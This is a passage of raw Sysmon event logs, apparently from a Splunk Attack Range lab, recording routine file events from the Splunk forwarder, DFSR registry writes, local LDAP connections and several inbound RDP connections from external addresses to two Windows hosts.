23542300x8000000000000000976429Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:56.264{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B16728A0A652B07E7A18CF323D8F4579,SHA256=441C09A521603294D37F9A224B04A9689404BC7EA91783AE5DE175011FF085A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:57.662{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32A97A42FAFFF3FEF4D5B4CF4989A7A3,SHA256=FB291F4DB1DCA7971D12D8F53F89A184EFFC8B03FB1C98831F40895AAD857739,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976434Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:54.764{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59253-false10.0.1.12-8000- 23542300x8000000000000000976433Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:57.588{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78604D109F1B363CC5464075DA48D268,SHA256=DF53014FED5DD50E8A61580E66BFBC4FB9E84816A9E69AA2854EAEB0927466CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:58.681{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6831CCD345C9F97849A2BF0C9185772,SHA256=CD463047B4EF3515EB7170E60C8DCB8F5F6B2240F097DE68E0DEB4EE3D002ECE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976437Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:55.736{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-6516-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976436Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:58.651{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB8320424FF25ED2E9A3166CDC41AD48,SHA256=98D73CD44C51697A7C5443577002FA3AB93B3DA7D0B756304B35BF85CD6F5E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976435Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:58.588{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=494DBBDD31FF662C5ABDC5CF1C314604,SHA256=CF511DE9B535D05C3DC77921BBDAD6EA5790906B3E5695F89674053527562E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976438Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:59.745{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE20C70E4C4B154141498D0AE283DC6E,SHA256=EAAFC7151F7CC3C57C8987C1675A87975937EF1A39CCD9367ED6DB7712976912,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:59.712{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3749E069EF2570343A2665D58F88928,SHA256=48CF73A7CE973E0B8A700CD6246657470FCA23B1AEC5F7982EFF20BC51501AFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976440Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:00.760{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9580D2DF9BA85E80D8F3FCF477E9E8B4,SHA256=D84BF2938E8946BC30512548D6F1816EACC0766FDCD07DCEEAD9E97BDF6C5E16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.727{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD48A3D7A4C77D774776D6350D4CD8E3,SHA256=88191969DD3553E991DEE69177B5EF63D158F13CF672A917B5073FEA04A67BD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976439Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:00.682{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25FFE93855E505C3F1123EF8A81D87F6,SHA256=079067B4021C72393ABF309F62D01A2A423D044193187CA06A75EAA539097624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976442Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:01.776{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CAE7EAB64DD562E03E41424920B68E1,SHA256=CC716B621CA730937B1DF505B0E03FF822CB436B340CFC026E783CE5C16D256B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:01.727{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F28E7CF53464B584FD5132D283D4860,SHA256=BAE3671E2D99EDFDF2FCB0854671070E1DA940727FBBFBD6B631C4B51DC1A67D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976441Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:57.606{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-17812-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 13241300x80000000000000001047923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:01:01.265{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x80000000000000001047922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:01:01.265{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Config SourceDWORD (0x00000001) 13241300x80000000000000001047921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:01:01.265{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_C073BBA9-345E-4F58-AADF-98D983B75502.XML 23542300x8000000000000000976443Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:02.779{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E821AA1BCF92ED050AB177B9A886A338,SHA256=F51C58CF829851F8D902F3014772997F43B841040FB0D248A7409C6D290BE892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:02.742{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F823DEBD2DE42B578F0AB85A1DCD3E7E,SHA256=2B6F0A62786A4653491297E8DBA34A74BBEBF408769ACE7AEB2EC868E79D39E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:01.021{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49172-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.987{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49217-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001047933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.987{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49217-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001047932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.971{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49216-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001047931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.971{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49216-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001047930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.953{5EBD8912-7F30-614D-0D00-00000000FC01}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49215-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001047929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.953{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49215-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 23542300x80000000000000001047928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:02.295{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71D5F1340879C74C620F099D52027DDB,SHA256=8FC34E253C41E171803FDF5884AD3A9D6E000A8E1E9F566F53EBA3825B122A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:02.295{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=961159C42DA1534B06A2F7065262D24E,SHA256=662DB7F2328DAD2AE2B10B1A9D6C2FD035190748ABF9EE1F08415EA7E6337EE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.788{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49214-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001047925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:00.644{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-64254-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000976445Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:03.966{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEDAD4840E06F498D207887FEDB07857,SHA256=D7EFD6DC7C5A5045DF4A4C2BC3D1A05448C6A7B994C5DBA8CC947F77A2390DD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976444Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:03.779{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5753E92F2D48094AF492250B54CFEC50,SHA256=00002DDAAFB76F6539DCDBD81BC32399B98BC8B8E5A33C9351554C8EF44B9AB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:01.975{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com50457-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:03.779{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A03F42A3327D284513D5ACD103FC6224,SHA256=668020E2C80CB696FF24107A984DF7514AAC557A14B241C03F18DAD166A1B523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:03.626{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71D5F1340879C74C620F099D52027DDB,SHA256=8FC34E253C41E171803FDF5884AD3A9D6E000A8E1E9F566F53EBA3825B122A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976449Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:04.794{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC0DCD928A9F6037FC6F9217B5DBBA56,SHA256=8552AD3D6CB9183BED30B383EBF5913239A0606A1F0AD11F08FCEE8E5179B2D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:04.926{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=990BBB1A16A53A03F1682DA23074AC26,SHA256=11384024174A5148A85BEC663E417D2405ED56F791CB108E766B549AAA20D7F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976448Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:01.239{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50416-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976447Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:00.699{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-29421-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976446Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:59.904{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59254-false10.0.1.12-8000- 23542300x80000000000000001047941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:05.940{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=867D05876C9CE43804FBC724EBCF5193,SHA256=E876C636308146788987C5F4C9C04B2B3FF2725862479059F61B290E4E77A4C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976451Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:05.810{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E74DFB2818AB7DE6E7924D926DF7481,SHA256=FC1CC1CDFD176ABDA8FEB286E1049D78A12C9BE1C300612462F784D3FDA44F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976450Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:05.779{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9426A725776731125BFC21B51BB288B,SHA256=CE74D97EC790C6A36E2703D64AB3C60C555CD531C4E8AC746FC806F33FC6DE7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:06.959{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6597526F74047D42BD8E28C3167AC7D4,SHA256=81025DE21EC6B4F939566D205DA93D0CF4D5FA867CBC33D3254EBF5CC61A3441,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976453Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:06.826{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22FA0206F111BC687DE0195F2A3361F9,SHA256=BD081A51F48FDB0D4746D0254F398AB75F6B5A4FC333F3D01E7095CEFDED992A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976452Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:03.218{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55922-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976455Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:07.841{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4E54E67BA9368682A63D7EAD87ED8E3,SHA256=B2D7357BDB0D679835F2406EEDF132E640508293235B0FA908B96DEC006CCFC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:07.976{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB16A69B40F919FF5C68DD39C9BD1D5,SHA256=318300E65E70E0E13ED81739DCA00F45083ECBB66EE95D38498E4EA6B79B0DE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976454Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:07.529{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B87EBCAF4A386A5A1606F10A29D4753E,SHA256=A32F7DB272774CFB9C43750666B5A993CF96C3C6B20A6DCB084171A6E3105A5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976458Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:08.857{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6A33599C5CC0521CA6A1692BAFB317F,SHA256=BD41F71C80B9F5DAD7E73DD550BF0D7A90E43F4B4D2FB3DE1536AF3DF4F7C914,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976457Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:04.733{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-58812-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976456Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:04.636{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com52086-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001047944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:05.869{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49218-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000976461Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:09.857{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20575289FA0194C75427BEBD54C9F5CE,SHA256=96A1056DE3E185558B3168A0B8763D561BC202630037C062A5C7739821CB08D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976460Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:09.857{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A3BC87AF8358FAA56B0657FFF86585A,SHA256=A68A127BC2D51A23E78B9E315A09DFBC43A0686BD68403F8695C76CE8FA7D578,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976459Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:05.860{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59255-false10.0.1.12-8000- 23542300x80000000000000001047950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:09.864{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program 